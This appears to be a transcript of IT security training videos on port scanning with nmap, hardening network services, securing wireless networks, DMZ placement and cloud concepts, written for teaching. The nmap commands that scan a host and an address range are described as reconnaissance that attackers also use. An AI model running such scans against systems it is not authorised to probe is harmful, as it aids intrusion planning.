result, its information gets displayed in the second section with the heading Default Web Site Home. On right-
clicking the Default Web Site suboption, a list of options appears. He selects the Edit Bindings option.] where
I'll choose Edit Bindings. [On clicking Edit Bindings, the Site Bindings dialog box opens which displays two
bindings. Also it contains the following buttons: Add, Edit, Remove, Browse, and Close.] Here we can see our
web server has two bindings – one for https on TCP Port 443 and another for http on TCP Port 80.
So notice here on the right, we can either Add new port bindings, also we even tie it to different IP addresses if
the server has multiple IPs, but we can also select an existing binding and Edit it and change things like the
Port number [He clicks the Edit button in the Site Bindings dialog box. As a result, the Edit Site Binding dialog
box opens. It contains two drop-down list boxes, namely Type and IP address; and two text fields, namely Port
and Host name.] if we really wanted to. Now you might do that for additional security so that anyone that
wants to connect to, for instance, a web site with a different port number would have to have knowledge of that
port number because it's not listening on the standard listening port. Now, at the same time, [He closes the Edit
Site Binding and Site Bindings dialog boxes.] there are plenty of tools out there both for Windows and Linux
that allow us to scan for ports. Here in Kali Linux, [The root@kali:~ window opens.] we can use the nmap
tool to scan either a network range or, in this example, a single host – in this case – to see which TCP ports are
open, what services is this host running.
This is part of reconnaissance, whether it's used for legitimate purposes or whether it's used for evil. So the
command here is nmap -sT for TCP and then I've given it the IP address of our Windows web server. Now
when I press Enter on that, after a moment, it will give me a listing of open TCP port numbers, one of which
certainly will include port 80 because we know that it is a web server. So we can see, we have quite a list of
open ports here including TCP port 84 HTTP. [He highlights the following line in the output: 80/tcp open
http.] We can also scan for UDP ports. I'm going to use the up arrow key to bring up a command that I've run
previously. I'm using nmap with -sU for UDP. Then I'm using -p to specify the port number I want to scan on a
host. In this case, I want to scan UDP port 53, which is the DNS client listening port.
So, when I press Enter in fact, [He executes the following command: nmap -sU -p 53 192.168.1.162.] I can see
that that specific port is actually open. So I know that that is a DNS server that is listening. And again, this is
all part of reconnaissance. Now we also have the option of scanning a range of machines for certain ports. For
instance, if I were to type nmap -sT for TCP and then I'll give it a range 192.168.1.100-200 and then press
Enter, it's going to scan for TCP open ports on all of those hosts. Once nmap completes the scan, down at the
bottom, I can see in this case, it's scanned 101 IP addresses, where 8 hosts are up. And, as I scroll back up
through, I can see the IP addresses and the open TCP ports on each of those IP addresses. Now sometimes, you
get fewer or more ports. It depends on what services are running in the machine and whether or not it's got a
host-base firewall that limits what ports you can see.
But either way, it's pretty easy to scan for open ports to see what's running. Now, from a malicious standpoint,
the bad guys and girls will be interested in this information because if they see, for instance, that there is an
FTP or a DNS server open on a host, they can then focus on that to determine what kind of FTP or DNS server
is running and check out version information, find out what exploits are available, and then begin
compromising systems in that manner. In this video, we learned about configuring and scanning for open ports.
[Topic title: Network Services. The presenter is Dan Lachance.] In this video, I'll talk about network services.
Network services listen on a TCP or a UDP port number for connections. So, for example, with the client DNS
query where a client is contacting a DNS server, the source port would be a higher-level UDP port – in this
case, for example, 55298. But the destination port would be unchanging because that's the network service
listening port – in this case, UDP port 53 for a DNS server. Services will often require specific permissions on
the host operating system. Now we should try to stay away where we can from a normal user account that has
a password that never expires or no password at all. Instead, if possible, we should configure network services
to use a managed service account. Now, in the Windows environment, this is a special type of account that is
designed for use by services where it has a complex password that will change automatically on a scheduled
basis.
Here, on a Windows device, if we look at the running Services [The Services window is open. It is divided into
two sections. The first section is a pane in which Services (Local) option is selected by default. As a result, its
information is displayed in the second section. The second section contains two tabs: Extended and Standard.
The information in the second section in the Extended tabbed page displays various services such as System
Events Broker, Superfetch, and Server.] and if we were to double-click on one and open it up, [Dan double-
clicks the Server option. As a result, the Server Properties (Local Computer) dialog box opens. It contains the
following four tabs: General, Log On, Recovery, and Dependencies.] in the properties, we would see a Log On
tab where we can determine whether the service logs on with a Local System account, whether it interacts with
the desktop, or whether it's configured to use a user or a managed service account. Now one thing to watch out
for is the temptation of using an administrative type of account that has way more permissions than the service
really needs. Required services are configured in the underlying OS with permissions according to the
principle of least privilege. This means that we only assign enough permissions for the service to function
properly and no additional permissions are given. We should also configure services to control incoming
traffic sources.
So, for example, if we have a Linux host that's managed through SSH, we might require that SSH traffic to
come from a known and trusted IP network range, maybe a subnet where the administrative stations exist. This
can also reduce discoverability when a malicious user is performing network scans over the network. We
should also enable encryption authentication wherever possible. Now this can be application specific, such as
when we configure an SSL or TLS certificate, for example, for a web site, POP3 mail server, or an SMTP
server. However, we could also have encryption and authentication at a much more general level in the form of
IPsec regardless of higher-level protocol used.
Hardening a host means disabling unused services. At least that's one part of hardening a host. So we can
harden a host by blocking unused ports and services. And, of course, if they're disabled, then they're not
running in the first place anyway. We can also configure services in some cases to use a nonstandard port.
Now you might do this, for instance, on a web server so that when someone types in the address of the web
server in their web browser address bar, they also have to add a colon and then the port number you've
configured. Now web servers normally listen on TCP port 80 or if it's secured, port 443. But you could change
it to a nonstandard port. That also makes it more difficult for malicious user to scan the network and map it out
based on what services they think are running because you're not using the normal service port numbers.
Another way to harden the network service is to take log files resulting from a specific service and storing
them on a different host. This is important because if the host on which a service is running is compromised,
then the log files are meaningless. They could be wiped, their contents could be forged, and so on. It's always
crucial that we apply the latest updates to the service and the underlying operating system hosting that service.
Some services can also be throttled. Now this might be true with some replication services that are designed
for file transfer between hosts. The great thing about this is if we can figure throttling, it prevents
monopolization of resources like CPU utilization or network bandwidth.
Network service hardening tools include some built-in items that you'll find in some operating system
environments. So an Active Directory domain environment would use Group Policy to centrally configure
settings on devices. So we could use Group Policy to centrally disable services potentially for a thousands of
computers joined at the domain. So, in this example, [The Group Policy Management window is open. The
window is divided into two sections. The first section is a navigation pane. It contains a Group Policy
Management node which further contains the Forest:fakedomain.local subnode. This subnode includes the
Domains subnode which further includes the fakedomain.local subnode. This subnode includes the Default
Domain Policy option. The second sections displays the content on the basis of the selection made in the first
section. The second section displays the information of the Default Domain Policy.] I'm in the Group Policy
Management tool for my Active Directory domain. I'm going to right-click on the Default Domain Policy GPO
on the left. And I'm going to Edit it. [He right-clicks the Default Domain Policy option. As a result, a shortcut
menu appears from which options can be selected. He selects the Edit option.] The goal here is we're going to
disable services centrally using group policy. [On selecting the Edit option, the Group Policy Management
Editor window opens. This window is divided into two sections. The first section is navigation pane which
contains the Default Domain Policy [SRV2012-1.FAKEDOMAIN.LOCAL] node. This node contains two
subnodes: Computer Configuration and User Configuration. The second section displays the information on
the basis of the selection made in the first section.]
Now you might say Group Policy is not a security hardening tool. Well, it can be. It depends how you use it.
We don't want to get into the mindset of thinking only third-party tools are useful for hardening because that's
definitely not the case. So, here inside this GPO, I'm going to go on to Computer Configuration [The
Computer Configuration subnode contains two subnodes: Policies and Preferences.] on the left. I'm going to
expand Policies. I'm going to expand Windows Settings. And there are number of things I could look at here.
For example, [The Policies subnode includes the Windows Settings subnode which further includes the
Security Settings subnode.] if I go on to Security Settings, well, naturally I have a lot of Security Settings
related to things like the File System, the Windows Firewall with Advanced Security, Public Key Policies for
PKI, and so on. But one of the things you'll see here under Security Settings on the left is System
Services. [He clicks the System Services option in the Security Settings subnode.] And, if I click that on the
right, I get an alphabetical listing of services.
So maybe what I'll do is click in that list and press R and go down to Remote Registry. Now, if I know that we
don't need the Remote Registry service running, we don't depend on it for any of our tools, then it might turn
that off to prevent remote access to the registry on a Windows host. So, if I were to double-click on it, [On
clicking the System Services option, its information gets displayed in the second section. He clicks the Remote
Registry option in the second section. As a result, the Remote Registry Properties dialog box opens.] I could
"Define this policy setting" and either set that service to Disabled or Manual. Now, once I've done this, [In the
Remote Registry Properties dialog box, he checks the following checkbox: Define this policy setting. And he
clicks the Manual radio button. Then he clicks the OK button.] Group Policy would have to refresh on
machines affected by this Group Policy object. Now that can take a couple of hours in some environments. It
really depends on your environment and how you're structured. Other ways to harden a device as per network
services are to use other tools like Microsoft System Center Configuration Manager or SCCM. SCCM can be
used to apply security baselines to Windows and Linux device collections to make sure they align with
organizational security policy. We might also use Microsoft PowerShell Desired State Configuration or DSC
which can be used to harden both Windows and Linux hosts. Network services apply at the application layer
primarily with higher-level protocols, such as Hypertext Transfer Protocol or Secure Shell. Now, even though
these are higher-level protocols that might apply to Layer 7 of the OSI model – the application layer – that
doesn't imply that it involves user interaction. In this video, we discussed network services.
After completing this video, you will be able to explain common wired and wireless network concepts.
Objectives
[Topic title: Wired and Wireless Networks. The presenter is Dan Lachance.] In this video, I'll talk about wired
and wireless networks. Wired networks are faster than wireless networks that transmit signals through the air.
They're also considered more secure since it's harder to physically gain access to wired transmission media that
it is with signals going through the air. Now, with wired networks, wiretaps are possible, however physical
access to the cables is required. With wireless networks, we have slower connection speeds than we do with
their counterpart – wired networks. They are considered less secure than wired and malicious users don't need
physical access to network gear in order to tap into wireless signals because they're flying through the air. As
long as they were within range and they have the right equipment, they can capture that traffic as it's being
transmitted.
Wireless networks also include cellular where the infrastructure is owned by a telecom carrier. Bluetooth
wireless networks are a personal short-range wireless technology that are used for things such as wireless
keyboards, wireless mice, media devices like Bluetooth speakers that you can hook your smartphone up to
without cables, as well as wireless headsets, and so on. The Wi-Fi standard is what most of us are using at
home in our personal networks. Although, you will see it in the enterprise also when secured properly. It has a
longer range than Bluetooth. Of course it's very convenient for users to connect to a Wi-Fi network. However,
the downside is it's easy for malicious users to configure a rogue hotspot. Now a rogue hotspot is what appears
to be a legitimate hotspot that users can connect to on their wireless network, but really it's been set up by a
malicious user to capture that type of connectivity information that a wireless client is transmitting.
IEEE has numerous standards including the 802.1x standard. Not to be confused with the 802.11 Wi-Fi
standard, this is different. 802.1x isn't specifically for wireless, but it can be used with wireless. But what is it?
It's a security standard. With 802.1x, we configure our network such that authentication is required prior to
being given network access. This is called network access control or NAC – N-A-C – for short. WEP stands
for Wired Equivalent Privacy. This is a wireless security standard as well. And it's an encryption standard. But
it's been deprecated for many years now because it's been proven to be easily exploited with freely available
tools in a matter of seconds. WPA stands for Wi-Fi Protected Access. This supersedes the Web deprecated
encryption standard. It uses TKIP, which stands for Temporal Key Integrity Protocol where we have a
changing key either on a timed basis or every so many packets, for instance, every 10,000 packets to make it
harder to crack the key.
It is superseded by WPA2, Wi-Fi Protected Access version 2. This gets enhanced by using AES or Advanced
Encryption Standard 256-bit encryption. Now WPA and WPA2 can run in either Enterprise mode where a
centralized RADIUS authentication server authenticates user access to the network. So in other words, the
wireless endpoints – the wireless access points and routers – aren't doing the authentication. They're just
handing it off to the RADIUS server. That's WPA and WPA2 enterprise. The personal equivalences for WPA
and WPA2 simply use a preshared key that is configured on the wireless access point or router. And that same
key must be entered when a client wishes to connect to that WLAN.
Now having a centralized RADIUS authentication server is part of the overall IEEE 802.1x security standard.
So how can we harden wireless networks since they are much more susceptible to attacks than their wired
counterparts? One way is to disable the SSID broadcast. The SSID is the name of the wireless network. And,
with most wireless networks, that's being transmitted for ease of connections from people that want to connect
to the network because they just scan the vicinity for wireless networks. They see the name, they click on it.
However, if we've disabled the SSID broadcast, it doesn't show up. So this means that people have to type in
the name of the wireless network. Often, it's case sensitive before they can connect. Additionally, a password
is usually required as well.
We can also enable MAC address filtering on our wireless network. What this does is allow us to either build a
list of allowed or denied MAC addresses. Now a MAC address is a Layer-2 address according to the OSI
model. It's the 48-bit hexadecimal address tied to a physical network card of some kind. Normally, what's done
on a wireless network is we add a list of allowed MAC addresses. So, if your device has a wireless card with a
MAC address that matches the allowed list, you're allowed to at least attempt to connect to the wireless
network because usually there's also a passphrase or WPA2-Enterprise where there is a RADIUS server that
you also have to authenticate to.
Just bear in mind that MAC addresses are very easily spoofed with freely available tools. Another way to
harden the wireless is, of course, to use WPA2 enterprise so that authentication isn't done by the wireless
access point or router. Instead, it just forwards it off to a central RADIUS server. We could also consider
disabling DHCP. Because, with DHCP being enabled on a wireless network, once people connect to the
network, we're giving them a valid IP configuration. That's just one more thing that could make it more
difficult for a malicious user to gain access to the network. We should also enable HTTPS administration so
that we don't have clear-text type of transmissions when admins are connecting over the network to the
wireless router or access point to administer it. So we should use HTTPS where possible.
Of course, we should patch wireless router firmware. Most of us know that we should be patching software all
the time but what about firmware, especially in wireless routers? There have been numerous cases where there
have been security vulnerabilities found in router firmware for wireless networks. So be sure to always keep up
to date, maybe subscribe to vendor web sites for your wireless router equipment to make sure you know when
there is a new firmware update. Here you're looking at the configuration page in a web browser for an Asus
wireless router. [The configuration page of the ASUS Wireless Router RT-N66U tool is divided into two
sections. The first section contains two subsections: General and Advanced Settings. The General subsection
includes several options such as Network Map, Guest Network, and Traffic Manager. The Network Map
option is selected by default. The second section displays the information on the basis of the selection made in
the first section. The second section includes subsections such as Internet status, Security level, and System
Status. The System Status subsection contains three tabs: 2.4GHz, 5GHz, and Status. The 5GHz tab is selected
by default. Its content includes various fields such as Wireless name(SSID) and WPA-PSK key and drop-down
list boxes such as Authentication Method and WPA Encryption.] Now, here under the System Status section
over on the right, we can see there is a drop-down list for Authentication Method for the wireless network.
"Open System" means it's not secured at all. Here it's set to WPA2-Personal, where down below, it's using
AES encryption. And we can see there is a preshared key or a PSK that's configured here on the wireless
router. People would have to know that to make a connection from their desktops, laptops, smartphones, and so
on. But, from the Authentication Method list, I could also choose WPA2-Enterprise where I would use a
centralized authentication server – a RADIUS server – other than the authentication being done here on the
wireless router. At the same time, if I were to click on the Wireless Advanced Settings over on the left with
this particular model, now the menus will differ depending on your wireless router. [In the Advanced Settings
subsection of the first section, Dan selects the Wireless option. As a result, its information is displayed in the
second section. The second section includes several tabs such as General, WPS, and WDS. The General tab is
selected by default. It includes several fields such as Band, SSID, and Hide SSID.]
But, over in the right, I have the option to Hide SSID or not. Notice here it's set to No, which means that it is
broadcasting the SSID. Anyone within proximity – within range of my wireless network – will see the name
being broadcast. Now the name – if we go back to the Network Map section over on the left, we can see here
the name of this wireless network is linksys5GHz. So that would be seen because it's not been suppressed from
being broadcast. Now, over on the left – if I were, for example, to click on LAN...now when I do that, [In the
Advanced Settings subsection of the first section, he clicks the LAN option. As a result, its information is
displayed in the second section. The second section includes tabs such as LAN IP, DHCP Server, and Route.
The LAN IP tab is selected by default. It contains two fields: IP Address and Subnet Mask.] it opens up a new
menu system where, for instance, I could go on to the DHCP Server tab and disable DHCP. Currently it's set to
Yes. It is currently enabled. [He clicks the DHCP Server tab. As a result, its information gets displayed which
contains several sections such as Basic Config and Enable Manual Assignment. The Basic Config section
includes several fields such as Enable the DHCP Server, Lease time, and Default Gateway.] If I scroll down
and choose the Administration menu link down on the left...and remember these menu links in these interfaces
are going to change even when you apply a firmware upgrade to your current router. [In the Advanced Settings
subsection of the first section, he clicks the Administration option. As a result, its information is displayed in
the second section which includes several tabs such as Operation Mode, System, and Firmware Upgrade.] I
have the option of going to the Firmware Upgrade tab where I could see commonly what version we're using.
And also, we would have to specify of course the New Firmware File that I want to apply to my wireless
router. And, on the left back onto Wireless one more time, we can see we have a Wireless MAC Filter tab [In
the Advanced Settings subsection of the first section, he clicks the Wireless option. As a result, its information
is displayed in the second section which includes several tabs such as General, WDS, and Wireless MAC
Filter. He clicks the Wireless MAC Filter tab.] where we could specify which specific MAC addresses, if I
choose Yes to turn that on, [The Wireless MAC Filter tabbed section contains two subsections: Basic Config
and MAC filter list (Max Limit: 64). The Basic Config subsection contains two drop-down list boxes: Band
and MAC Filter Mode. It also contains Enable MAC Filter field, adjacent to it are two radio buttons: Yes and
No. He selects the Yes radio button for the Enable MAC Filter field.] should be allowed to connect to this
wireless network.
[Topic title: Use Common Wireless Tools. The presenter is Dan Lachance.] In this video, I'll demonstrate how
to use common wireless tools in both the Windows and Linux operating systems. Let's start with Windows 10
where I've already started the Network and Sharing Center. [The Network and Sharing Center window is open.
In this window, there are two sections. The first section is a navigation pane which has the following options:
Control Panel Home, Change adapter settings, and Change advanced sharing settings. The second section has
the following subsection displayed: View your basic network information and set up connections. Under this
subsection, there are two subsections: View your active networks and Change your networking settings.] In
the Network and Sharing Center, we can see any active network connections that we have over here on the
right. I see that I'm connected to a network called linksys, which is the name of a wireless network. And we're
connected through our interface called Wi-Fi. So I'm going to click on Change adapter settings over on the
left [In the navigation pane, Dan clicks the Change the adapter settings option. As a result, the Network
Connections window opens. It displays various network adapters such as Ethernet, Ethernet 3, and Wi-
Fi.] where I can see I've got my Wi-Fi network adapter as I've named it and it's connected to the linksys
wireless network. As with any network adapter, [He right-clicks the Wi-Fi network adapter. As a result, a
shortcut menu appears from which options can be selected.] wireless networks are really no different in the
sense that we can go into the Properties of adapters for them and we can configure things [From the list of
options, he selects the Properties option. As a result, the Wi-Fi Properties dialog box opens. It contains two
tabs: Networking and Sharing. Under the Networking tab, there are the following three sections: Connect
using, This connection uses the following items, and Description.] such as Internet Protocol Version 4
(TCP/IPv4), Internet Protocol Version (TCP/IPv6), and so on. In the case of a wireless network connection,
there is also a Sharing tab that we might go into to allow other networks that we might be connected to, [He
clicks the Sharing tab in the Wi-Fi Properties window. Under this, he checks the following checkbox: Allow
other network users to connect through this computer's Internet connection.] including wired networks to
access the Internet through our wireless connection. However, I'm not going to do that, I'm going to Cancel.
Now, in the Windows environment as well, I can go down into the taskbar area and click on the arrow to get a
list of wireless networks.
Now any wireless networks that are hidden will show up as Hidden Network. And, when you click on it,
you've got to specify the name of the wireless network that you want to connect to, and it's case sensitive.
Now, beyond that, if you have to supply a passphrase or anything like that, that will also be required in
addition. But, in the Windows environment, we can also use Group Policy essentially in Active Directory to
configure wireless network settings. I've started the Group Policy Management tool where on the left, I can see
the Default Domain Policy, GPO or Group Policy Objects. [The Group Policy Management window opens. In
the first section, the Default Domain Policy folder is selected by default and its content is displayed in the
second section.] I'm going to right-click on it and Edit it because I want to essentially configure Wi-Fi settings
for many clients with this central single configuration. [The Group Policy Management Editor window is
open. In the first section, under the Computer Configuration subnode, there are two subnodes: Policies and
Preferences.] So, therefore on the left, what I would have to do to make that happen is under Computer
Configuration, I would expand Policies, Windows Settings, and then Security Settings.
Now, under here, what you're going to see on the left is Wireless Network (IEE 802.11) Policies. So I'm going
to expand that. Now there is nothing to see yet. And so, if I click on it on the right, I see that nothing has been
configured. So, to configure something on the right, I would right-click [In the navigation pane, under the
Security Settings subnode, he selects the Wireless Network (IEEE 8.2.11) Policies option. In the second
section, he right-clicks and a shortcut menu appears from which options can be selected.] and "Create A New
Wireless Network Policy for Windows Vista and Later Releases". [The New Wireless Network Policy
Properties window opens. It contains two tabs: General and Network Permissions. The General tab is selected
by default. It includes three fields such as Policy Name, Description, and Connect to available networks in the
order of profiles listed below. The third field contains table with no entries. There are several columns in it
such as Profile Name, SSID, and Authentication. Below this table, there are the following buttons: Add, Edit,
Remove, Import, and Export.] So essentially, what I would be doing here when I click the Add button is
adding an Infrastructure type of wireless network not an Ad Hoc [He clicks the Add button. As a result, a list
of options appears, he selects the Infrastructure option. Then the New Profile properties dialog box opens.] or
peer-to-peer network where I would specify the SSID of the network, [The New Profile properties window
contains two tabs: Connection and Security. The Connection tab is selected by default. Under this tab, there
are various fields such as Profile Name and Network Name(s) (SSID).] whether we should connect to it
automatically, and so on. Now, under Security, I can specify the type of security whether it's WPA-
Personal [Under the Security tab, there are two drop-down list boxes: Authentication and Encryption.] which
requires only a preshared key or whether it's WPA2-Enterprise which uses a centralized RADIUS
authentication server. But the one thing I can't configure here is passphrases.
So the user will still have to know that it will be prompted for it when they connect the first time. But the nice
thing about this is when Group Policy refreshes on Windows clients, which could take a few hours in some
environments, this will automatically be configured as a wireless network setting for them. It saves us from
having to do it individually on each wireless client. Now let's flip over to the Linux side, where in various
Linux variants, yes, we can use the GUI interface to configure wireless settings. But we're going to do it at the
command-line level, which is pretty standard and generic. Here, in Kali Linux, at the terminal prompt, [The
root@kali:~ window is open.] the first thing I will do is type iw dev to show any wireless devices. [He
executes the following command: iw dev.] Here I can see I've got an interface called wlan0. So that's the one
that we're going to be working with. Now what I could do is use the command iwlist, Spacebar, the name of
my interface wlan0, Spacebar, scan. Now I'm going to pipe that to the "more" command. The pipe symbol is
the vertical bar symbol. You get that by shifting your backslash key. I'm doing this because I wanted to stop
after the first screen full of information because this is going to list wireless networks that are visible to this
station.
Now, when I do that, it will list a lot more than just the wireless network names or SSIDs. It's going to list a lot
of details [He executes the following command: iwlist wlan0 scan | more.] for each wireless network that
shows up in the list. So, for instance, here I can see my first wireless network and notice that the ESSID is
actually not really visible. It looks like a bunch of x's and 00's because this is a hidden network. But I can't see
other details like the MAC address, the channel, and the frequency, and what not. So, as I go through this
screen output, I'll see various SSIDs for different networks that were seen from this command. Now what I
could do is bring that command back up with the up arrow key. Instead of piping it to more, I'm going to pipe
it to the grep line filter where I am going to take a look for SSID in capitals. [He executes the following
command: iwlist wlan0 scan | grep SSID.] This is going to filter lines only that contain the text SSID. So, if
that's all I'm looking for are the names of the wireless networks, then this might be the way to go when using
iwlist. So here I can see the first entry again as a hidden wireless network, then I see others like linksys,
ASUS_Guest1, and so on. So now that I've gotten this far, the next thing I want to do is configure my station to
connect to the linksys network. So I'll do that by typing iwconfig wlan0 that's my wireless interface. And I'll
tell it that the ESSID I want to connect to is called linksys. Now this will work even if it was a hidden wireless
network. [He executes the following command: iwconfig wlan0 ESSID linksys. The following output is
displayed: Error for wireless request "Set ESSID" (8B1A) :, SET failed on device wlan0 ; Operation already
in progress.] Now, if I already have a connection to that wireless network which I do, I will get a message that
states that the operation is already in progress. So this is expected in this particular case.
Now the next thing that I could do is use the wpa_passphrase tool to specify the WPA passphrase in a file that
I will feed in to my connection, to that wireless network called linksys. So I'm going to use wpa_passphrase,
then I'm going to give it the name of my wireless network linksys. And I'm going to give it the passphrase for
WPA. So I am going to put it in the proper case and then get a use upward redirection – so the greater than
symbol. We'll put redirection to create a file here called linksys.conf. It could be called anything. Now the next
thing I want to do is just view that. I'll use the cat command [He executes the following commands:
wpa_passphrase linksys urnotFam0us > linksys.conf and cat linksys.conf.] to take a peek of what it did. And
notice that it commented out the text version of my passphrase. So now we've got our preshared key in a form
that is usable to associate with the access point. So, to make that happen, we're going to use the
wpa_supplicant command. Now this is kind of a weird Linux command in that when you use command-line
parameters like -D for the driver, the value isn't separated from the parameter by a space as it's normally the
case. Here it's right and against it. That goes also for the -i or interface parameter. I'm going to give it wlan0,
no space, -c for the config file, no space, it's called linksys.conf. And I will go ahead and press Enter. [He
executes the following command: wpa_supplicant -Dwext -iwlan0 -clinksys.conf.]
Now, after that's completed, if I type iwconfig, I can see that our wlan0 interface is now associated with the
linksys SSID. So we have an association with the access point. I could then use the dhclient command and
specify wlan0 to make sure that the DHCP executes for the interface so that we get an IP address. And then I
can use the ifconfig command to show all my interfaces including wlan0, [He executes the following
command: ifconfig.] which we can see here now has an IP address. So, if we were to ping something, for
example, on the Internet to verify we have connectivity, we can see indeed that it is working. [He executes the
following command: ping www.google.com.]
In this video, we learned how to use common wireless tools in Windows and Linux.
In this video, find out how to determine the placement of network devices.
Objectives
[Topic title: Internal and External Networks. The presenter is Dan Lachance.] The placement of network
services is a big part of security configuration. In this video, we'll talk about internal and external networks. An
internal network will contain sensitive IT systems, including things like directory servers – like an Active
Directory domain controller, file servers, database servers, and intranet web servers. Now encryption should
also be used for network traffic internally. Most networks tend to use it externally when transmitting e-mail or
connecting to an external web site, but we should also consider that many network attacks occur from the
inside.
So we should use encryption then for both data in motion – data being transmitted over the network; data at
rest – so encrypted hard disks and encrypted files. And we might also be required to do this for regulatory
compliance. That's definitely the case if you're looking for PCI-DSS compliance if you're a retailer that deals
with cardholder information, for example.
External networks are public facing such as a demilitarized zone or a DMZ. A DMZ is either a couple of
switchports or it could be an entire network segment that is visible to a public facing network like the Internet,
but also has controlled access to an internal network. Now the DMZ is where you place things like VPN
appliances, public HTTP, and FTP sites because they need to be reachable from the Internet. However, we
should never replicate data from our internal network to external. So, for example, if you use Microsoft Active
Directory domain controllers, you would never replicate from an internal domain controller to one that's in the
DMZ. We should also host logs outside of those devices or hosts in the DMZ because if it's in the DMZ, it's
reachable from the Internet and it potentially could be compromised. And a compromised host means that the
log files on that host are also compromised. So log forwarding should be configured to an internal secured
host. And you can do that on Windows as well as UNIX and Linux.
Then there are cloud virtual networks where our on-premises network can be extended to a cloud virtual
network. It's kind of like having another network on-premises, except you really access it through the Internet.
This is often done through a site-to-site VPN link between your on-premises network and your public cloud
provider. Or you might even have a dedicated leased line between your site and the cloud provider that doesn't
go through the Internet. Then there are cellular networks which are also considered external. We don't control
them. Mobile device users, if you think about it, really present an enormous risk for malicious user entry into
the enterprise because if a smartphone is compromised, then any of the apps and data...now often data won't
actually be stored on the smartphone. But there are apps that users use to access sensitive data through the
phone. If the phone is compromised, potentially that data could be as well. So it's crucial that we think about
smartphones and tablets as computers. They should have a firewall, virus scanner, firmware updates, they
should be hardened, and so on.
Now all of those things are really more IT geek things. But, at the end of the day, the most important thing is
user awareness. People that use smartphones and tablets on work networks need to be aware of not visiting
web sites they should not be looking at or making sure things are kept up to date and not opening e-mails they
were not expecting because it might be a phishing attack and so on. DLP stands for data loss prevention. This
gives us central control of how apps and data can be used. You have to have a tool that does this. And it's often
used with mobile device management or MDM-centralized tools to manage mobile devices. So, for example,
what this means is we might have file attachments in a company e-mail app that can be accessed within the e-
mail or stored on corporate file servers, but can't be stored on a personal cloud storage account – we're
preventing that sensitive data loss. All internal and external devices need to be patched. They need to have
antimalware running and up to date. They need to have a personal firewall app configured appropriately for
your network and what should be allowed into the device and out of the device. And we should also be
encrypting both data in motion and data at rest when we think about demilitarized zones – or DMZs – and the
host placements, anything that needs to be publicly accessible to the Internet. So, if you are using a VPN
solution, for example, so that travelling users and your home users that work from home can get into the
company network, then they need to be able to connect over the Internet to at least the VPN public interface.
So normally, the VPN appliance would be in the DMZ or it might appear that way. You might actually be
using a reverse proxy that users connect to, which in turn actually sends that connection to the VPN to an
internal device elsewhere. There are many ways to configure it. But, generally speaking, we don't put sensitive
information in the DMZ. We put public-facing services that require an Internet access there. Now many home
wireless routers, like the one I'm looking at here – my ASUS wireless router – will allow you to set up DMZ
configurations. The same idea is available, of course, at the corporate level using enterprise equipment. So here
in my ASUS wireless router configuration tool. [The configuration page of the ASUS Wireless router
configuration tool opens.] Over on the left, I am going to click on WAN for wide area network since, as we
know, the DMZ really is public facing. [In the Advanced Settings subsection of the first section of the
configuration page, he clicks the WAN option. As a result, its information is displayed in the second section
which includes several tabs such as Internet Connection, Dual WAN, and Port Trigger.] Now what I want to
do here is click on the DMZ tab up at the top, and down below the DMZ has not been enabled. So I can choose
the Yes radio button where I can put in the IP address of a station or a device or a server that I want reachable
from the outside. Now, in a true enterprise environment, you will have many more configuration options than
this. But it's available even with standard consumer wireless products. In this video, we talked about internal
and external networks.
Table of Contents
After completing this video, you will be able to explain the purpose of cloud computing.
Objectives
[Topic title: Cloud Concepts. The presenter is Dan Lachance.] In this video, we'll have a chat about cloud
concepts. Cloud computing is interesting because really we are using technological solutions that we've
already had for a while, we're just using them in a different way. Cloud computing has a number of
characteristics, one of which is on-demand and self-service. This means that at any time, we should be able to
connect over the Internet, for example, to some kind of a web interface and provision resources as needed. So,
for example, if I need more cloud storage because I've run out of space, I should be able to provision that
immediately. The next characteristic is broad network access. We should be able to connect from anywhere
over the Internet pretty much using any type of device – whether it's an app on a smartphone or using a web
browser on a desktop computer to provision and work with cloud services. Resource pooling refers to the fact
that cloud providers have the infrastructure – they've got virtualization servers that can run virtual machines.
They've got all the network switching and routing equipment and firewall equipment, VPN equipment, storage
arrays that we can provision using easy to navigate web interfaces. So all of the cloud customers, or tenants as
they're called, are essentially sharing from this resource pool.
Rapid elasticity refers to the fact that we can provision as well as de-provision cloud services as needed. So, in
our previous example where we need more cloud storage either personally or even at the enterprise level, we
can expand that storage immediately. In the same way, we can reduce that service as we don't need it. Another
way to look at it is with virtual machines. If I need to test something on a server operating system, I can spin
up our virtual machine in the cloud in minutes. And then, when I'm finished testing, de-provision it so I don't
get charged for it any more. So measured service is a big part of cloud computing where all of our utilization
of IT resources is measured. So the amount of traffic into or out of a specific cloud service, you might be
charged a fee. You might also be charged for how much storage space you're using. Certainly, if you are
running virtual machines in the cloud, you're paying, well they're running. Often you pay by the hour – in some
cases, maybe by the minute. Certainly, if you're running database instances in the cloud, you're being charged.
It's absolutely crucial that when you don't need a service in the cloud, that you de-provision it because
otherwise you could get a nasty surprise at the end of the month when you look at the bill for your usage.
Cloud computing also includes different categories of services. For example, IaaS stands for Infrastructure as a
Service. And, of course, this is going to include things like storage and virtual machines and so on. Platform as
a Service, or PaaS, includes things like specific operating system platforms and database platforms and
developer platforms that we can use in the cloud instead of having that on our own network. Software as a
Service – or SaaS – deals with software that users can interact with where really most of the work is done by
the provider. Think of things like cloud-based e-mail or cloud-based office productivity tools like Google Docs
or Microsoft Office 365 – those are SaaS. We'll talk about those more in another video.
Cloud computing implies virtualization. Virtual machines are being used. Now, in some cases with some cloud
providers, when you provision resources – let's say you provision a Microsoft SQL Server database in the
cloud or a MySQL database – you might not see the intricacies related to the virtual machine that runs your
database, but it is running in a virtual machine instance.
Now, even though cloud computing implies virtualization, the opposite is not true. So, just because you might
be using virtual machines on your corporate on-premises network, that doesn't mean you've got a private cloud
because we have to think about all the characteristics that we talked about when we began this discussion –
things like broad network access, rapid elasticity, and so on.
SDN stands for software-defined networking. And this is a big deal with cloud computing. Now, if you think
of an on-premises network, if you want to add another network or a subnet, then normally what you'll do is
physically get more cables, maybe another switch. You might even configure a VLAN within your switch. In
the cloud, we just use a nice, easy to work with interface or web page, and it will modify underlying network
infrastructure owned by the cloud provider to provision things like VPNs or subnets that run in the cloud.
That's software-defined networking.
Virtualization, as we said, doesn't imply cloud computing. In order to have a cloud – whether it's a private
cloud on your on-premises equipment that you control and own or in the public cloud – you've got to meet all
of those cloud characteristics that we discussed at the beginning of this chat. Private clouds mean that we have
those characteristics on company-controlled infrastructure. Public cloud, of course, means it's on cloud
provider infrastructure. Availability is very important because when you think about cloud computing,
especially public cloud computing, you're really trusting somebody else to host potentially crucial IT services.
